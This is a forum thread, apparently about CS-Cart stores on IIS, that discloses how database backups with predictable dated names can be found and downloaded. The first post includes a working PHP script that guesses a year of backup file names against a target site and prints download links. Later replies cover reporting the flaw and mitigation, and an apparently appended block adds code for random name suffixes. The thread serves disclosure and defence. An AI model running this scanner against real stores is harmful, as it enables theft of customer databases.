Database backup for IIS = data gone

This is bad news for IIS server people. I am sure it is known but I want to tell about it anyway.



Directory: /var/database/backup/

File scheme: 'dump_'.date('mdY').'.sql.tgz'



While IIS does not allow listing the directory, the DB files are EXPOSED through blind sampling.



I was able through headers to identify what stores run IIS and then scan the backup folder for files with today's date and down one year.



I was able to immediately find a website with downloadable database.


```
$site='blah.com';
$now=time();
for($i=0;$i<(356);$i++){
	$offset=strtotime("-$i days",$now);
	$date=date('mdY',$offset);
	$show=date('F j, Y',$offset);
	$fname="dump_$date.sql.tgz";
	echo "Testing $show:";
	$url="http://$site/var/database/backup/$fname";
	echo "[$url]";
	if(@fopen($url, "r")){
		echo " EXISTS <a href='$url'>DOWNLOAD</a><br>";
	}else{
		echo ' no<br>';
	}
}
```

**It would help if DB backups would have a trailing string added to their names of [A-Za-z0-9] kind - say 8 chars...**

Can Cs-Rep contact me so I could give them the store with exposed DB so you can officially contact them and let them know?



I don’t know if this is an option…

helpdesk.cs-cart.com

And yet another reason why it is not wise to save DB Backup copies of your stores online!



What I do is backup our DB, then immediately go into /var/database/backup/ and save the backups onto a local pc. Then promptly delete the backup from our site.

True, but by design it works if used in an Apache environment. Sure, there could be a password added to the zip and a random string padded with.

Well, I posted in the help desk. They don’t read what I posted.



First they said that I don’t have a cs-cart license, they cannot offer help until I get one. Second time they said it is not the website I have on the account and they cannot help me until I transfer that license to my account…



I give up.



If you don’t want to inform YOUR customer then there is nothing that I am willing to do.

[quote name=‘TexasGuy’]Well, I posted in the help desk. They don’t read what I posted.



First they said that I don’t have a cs-cart license, they cannot offer help until I get one. Second time they said it is not the website I have on the account and they cannot help me until I transfer that license to my account…



I give up.



If you don’t want to inform YOUR customer then there is nothing that I am willing to do.[/quote]

Did you read this? [url]https://www.cs-cart.com/support-item.html[/url]

Do you have a license yet?

Yes, I bought my license from Blue Labs, it is much cheaper. However, they take their sweet time processing it.



BTW, the CS-Cart support has informed me that they will take steps to inform the website operator, finally someone read the support ticket before dismissing it for “technical reasons.”
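
The mitigation suggested in the thread (an 8-character [A-Za-z0-9] suffix on backup names) could look like the following. This is an added example, not CS-Cart code and not from any poster; the function names, the `dump_<date>_<suffix>.sql.tgz` naming and the temp-directory demo are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not part of CS-Cart.

// 8 characters from [A-Za-z0-9] drawn from the CSPRNG (random_int),
// not rand()/mt_rand(), so the suffix cannot be predicted from the date.
function random_suffix(int $len = 8): string {
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    $max = strlen($alphabet) - 1;
    $out = '';
    for ($i = 0; $i < $len; $i++) {
        $out .= $alphabet[random_int(0, $max)];
    }
    return $out;
}

// Name for a new backup: the date stays readable, the suffix is unguessable.
function backup_name(?int $ts = null): string {
    return sprintf('dump_%s_%s.sql.tgz', date('mdY', $ts ?? time()), random_suffix());
}

// Rename backups that still use the guessable dump_MMDDYYYY.sql.tgz scheme.
// Returns a map of old name => new name.
function harden_existing(string $dir): array {
    $renamed = [];
    foreach (scandir($dir) ?: [] as $f) {
        if (!preg_match('/^dump_(\d{8})\.sql\.tgz$/', $f, $m)) {
            continue; // already suffixed, or not a backup
        }
        $new = sprintf('dump_%s_%s.sql.tgz', $m[1], random_suffix());
        if (rename("$dir/$f", "$dir/$new")) {
            $renamed[$f] = $new;
        }
    }
    return $renamed;
}

// Demo on a constructed temporary directory with two constructed file names.
$dir = sys_get_temp_dir() . '/backup_demo_' . random_suffix();
mkdir($dir, 0700);
touch("$dir/dump_01152024.sql.tgz");
touch("$dir/dump_01162024.sql.tgz");
print_r(harden_existing($dir));
echo backup_name(), "\n";
array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

With 62 possible characters in each of 8 positions there are 62^8 (about 2.2 × 10^14) candidate names per date, so sampling by date alone no longer finds the file. The name only stays secret while directory listing remains disabled, and copying backups off the server and deleting them, as described above, is still the stronger habit.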